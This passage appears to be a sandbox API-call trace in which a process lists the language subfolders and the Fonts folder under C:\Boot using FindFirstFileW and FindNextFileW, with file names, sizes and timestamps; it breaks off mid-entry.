lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.331] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.331] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.331] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.331] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.332] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.332] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.332] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.332] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.332] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.332] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.333] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.333] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.333] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.333] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.333] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.333] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.333] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.334] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.334] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.334] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.335] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.335] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.335] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0093.335] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0093.335] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.335] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.336] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.336] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.336] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0093.336] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.336] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.336] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.337] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.337] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.337] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.337] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.337] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.338] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.338] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.338] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.338] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.338] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.338] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.339] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.339] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.339] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.339] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.339] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.339] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.339] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.340] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.340] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.340] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.341] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0093.341] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, 